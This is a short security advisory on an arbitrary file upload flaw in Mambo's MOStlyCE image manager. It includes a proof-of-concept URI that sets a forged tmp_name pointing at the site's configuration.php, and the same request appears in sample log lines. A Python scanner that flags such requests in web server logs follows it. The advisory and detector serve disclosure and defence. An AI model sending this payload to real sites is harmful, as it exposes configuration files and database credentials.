Mambo MOStlyCE Module Image Manager Utility Arbitrary File Upload Vulnerability

Attackers may exploit this issue through a browser.

The following proof-of-concept URI is available:

http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=
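
The proof-of-concept passes the upload fields (name, tmp_name, size) as URL parameters rather than in a multipart request body, and a browser performing a normal upload never sends a tmp_name, so the request leaves a distinctive trace in web server logs. The Python sketch below is an added example, not part of the original advisory: it flags access-log entries whose query string carries an array field ending in [tmp_name]. The function names are hypothetical and the log lines are constructed samples in combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# Bracket segments of a PHP-style array parameter such as file[NewFile][tmp_name].
SEGMENT_RE = re.compile(r"\[([^\[\]]*)\]")

def claimed_tmp_names(target):
    """Return (key, value) pairs whose last array segment is tmp_name."""
    hits = []
    # parse_qsl percent-decodes keys, so %5Btmp_name%5D is caught as well.
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        segments = SEGMENT_RE.findall(key)
        if segments and segments[-1] == "tmp_name":
            hits.append((key, value))
    return hits

def scan(lines):
    """Yield (line_number, path, hits) for every log line that carries one."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        hits = claimed_tmp_names(target)
        if hits:
            yield number, urlsplit(target).path, hits

CONNECTOR = ("/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/"
             "filemanager/connectors/php/connector.php")
# Constructed sample log lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "POST ' + CONNECTOR +
    '?Command=FileUpload&CurrentFolder= HTTP/1.1" 200 120',
    '192.0.2.77 - - [01/Jan/2010:10:05:00 +0000] "GET ' + CONNECTOR +
    '?Command=FileUpload&file=a&file%5BNewFile%5D%5Bname%5D=abc.gif'
    '&file%5BNewFile%5D%5Btmp_name%5D=C:/path/to/MamboV4.6.2/configuration.php'
    '&file%5BNewFile%5D%5Bsize%5D=1&CurrentFolder= HTTP/1.1" 200 87',
    '192.0.2.10 - - [01/Jan/2010:10:06:00 +0000] '
    '"GET /index.php?user[name]=bob HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, path, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {path} carries client-supplied {hits}")
```

Only the query string is inspected here; the same fields sent in a POST body do not appear in a standard access log and need a WAF or application-level check.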


 

Copyright 2010, SecurityFocus